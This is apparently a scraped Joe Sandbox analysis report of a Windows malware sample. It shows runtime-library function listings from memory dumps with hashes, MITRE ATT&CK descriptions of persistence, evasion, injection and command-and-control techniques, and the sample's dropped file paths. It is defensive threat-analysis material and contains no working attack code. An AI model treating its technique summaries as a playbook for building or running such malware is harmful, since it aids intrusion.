Instruction ID: 586c0dce936d236a8fd58fa9a4f72b6dfc9282abbba5a42a221f029554ca40df
Opcode Fuzzy Hash: d48e1152523ea5062a06ea28b46f08a3f14626caad1705564076688aac0259a3
Instruction Fuzzy Hash: 8211DF70800702AFD760AF75DC45B8ABBF2AF10310F20441DF499933A1CB70AA449FA8

Function 006340A0 Relevance: 7.5, APIs: 5, Instructions: 47
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__getptd.LIBCMT ref: 006340AC

Part of subcall function 00632345: __getptd_noexit.LIBCMT ref: 00632348
Part of subcall function 00632345: __amsg_exit.LIBCMT ref: 00632355

__amsg_exit.LIBCMT ref: 006340CC
__lock.LIBCMT ref: 006340DC
InterlockedDecrement.KERNEL32(?), ref: 006340F9
InterlockedIncrement.KERNEL32(02BD2AC8), ref: 00634124

Memory Dump Source

Source File: 0000002C.00000002.2710014165.0000000000631000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00630000, based on PE: true

Associated: 0000002C.00000002.2709984751.0000000000630000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000002C.00000002.2710038033.0000000000638000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000002C.00000002.2710064929.000000000063A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000002C.00000002.2710086468.000000000063C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_44_2_630000_QmbK8U.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID:
API String ID: 4271482742-0
Opcode ID: ead4b7a454c899583b2ea00fd5e2aa2601648a39331651829fb12cc74812fa6f
Instruction ID: 90daf3aad1c9c865958ff6d7b17b7bc3bc64007c2b494fd50b26df747dce54b8
Opcode Fuzzy Hash: ead4b7a454c899583b2ea00fd5e2aa2601648a39331651829fb12cc74812fa6f
Instruction Fuzzy Hash: 9101C032A01A229BC765AF6488063ADF3A3BF11710F054009F900B7391CF347D91EBEA

Function 006335EE Relevance: 7.5, APIs: 5, Instructions: 44
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__lock.LIBCMT ref: 0063360C

Part of subcall function 00632AA0: __mtinitlocknum.LIBCMT ref: 00632AB6
Part of subcall function 00632AA0: __amsg_exit.LIBCMT ref: 00632AC2
Part of subcall function 00632AA0: EnterCriticalSection.KERNEL32(?,?,?,00635600,00000004,00639628,0000000C,00633746,?,?,00000000,00000000,00000000,?,006322F7,00000001), ref: 00632ACA

___sbh_find_block.LIBCMT ref: 00633617
___sbh_free_block.LIBCMT ref: 00633626
HeapFree.KERNEL32(00000000,?,00639568,0000000C,00632A81,00000000,006394C8,0000000C,00632ABB,?,?,?,00635600,00000004,00639628,0000000C), ref: 00633656
GetLastError.KERNEL32(?,00635600,00000004,00639628,0000000C,00633746,?,?,00000000,00000000,00000000,?,006322F7,00000001,00000214), ref: 00633667

Memory Dump Source

Source File: 0000002C.00000002.2710014165.0000000000631000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00630000, based on PE: true

Associated: 0000002C.00000002.2709984751.0000000000630000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000002C.00000002.2710038033.0000000000638000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000002C.00000002.2710064929.000000000063A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000002C.00000002.2710086468.000000000063C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_44_2_630000_QmbK8U.jbxd

Similarity

API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2714421763-0
Opcode ID: f35b24283bea462049e6d09718d22d488cf21671b3dd9ea1373b792bfbb31c87
Instruction ID: ea18e6c05d93647911f9f5ce30713e1139d8939d75d5a2d5b913831d71024582
Opcode Fuzzy Hash: f35b24283bea462049e6d09718d22d488cf21671b3dd9ea1373b792bfbb31c87
Instruction Fuzzy Hash: E2014B71D04326AFDB606B719C17B9E7AA7AF12760F60500DF540A6392CF388A80CBDD

Function 00633E04 Relevance: 6.0, APIs: 4, Instructions: 31
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__getptd.LIBCMT ref: 00633E10

Part of subcall function 00632345: __getptd_noexit.LIBCMT ref: 00632348
Part of subcall function 00632345: __amsg_exit.LIBCMT ref: 00632355

__getptd.LIBCMT ref: 00633E27
__amsg_exit.LIBCMT ref: 00633E35
__lock.LIBCMT ref: 00633E45

Memory Dump Source

Source File: 0000002C.00000002.2710014165.0000000000631000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00630000, based on PE: true

Associated: 0000002C.00000002.2709984751.0000000000630000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000002C.00000002.2710038033.0000000000638000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000002C.00000002.2710064929.000000000063A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000002C.00000002.2710086468.000000000063C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_44_2_630000_QmbK8U.jbxd

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID:
API String ID: 3521780317-0
Opcode ID: d1c834365e6666d2636e2808c4347629fd99785d861c6d72073b7152228d8e85
Instruction ID: 8a8a427b5d3064e2855395e1f4085eb5303f0f295da68ac74025f1f6ebcda6c2
Opcode Fuzzy Hash: d1c834365e6666d2636e2808c4347629fd99785d861c6d72073b7152228d8e85
Instruction Fuzzy Hash: EFF030329047229BD7A0BBB4881778D73A3AF44B20F50455EE441973E2CF749A419BDA

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	Process: OS API Execution, Process: Process Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 2976587-987347589.08.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Change of critical system settings

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\byHW9q\byHW9q.exe

C:\Program Files (x86)\byHW9q\log.src

C:\Program Files (x86)\byHW9q\tbcore3U.dll

C:\Program Files (x86)\byHW9q\utils.vcxproj

C:\Program Files (x86)\x736Pg9\QmbK8U.exe

C:\Program Files (x86)\x736Pg9\log.src

C:\Program Files (x86)\x736Pg9\tbcore3U.dll

C:\Program Files (x86)\x736Pg9\utils.vcxproj

C:\Users\Public\Music\destopbak.ini

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\FOM-51[1].jpg

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\b[1].gif

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\s[1].jpg

Windows Analysis Report
2976587-987347589.08.exe

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre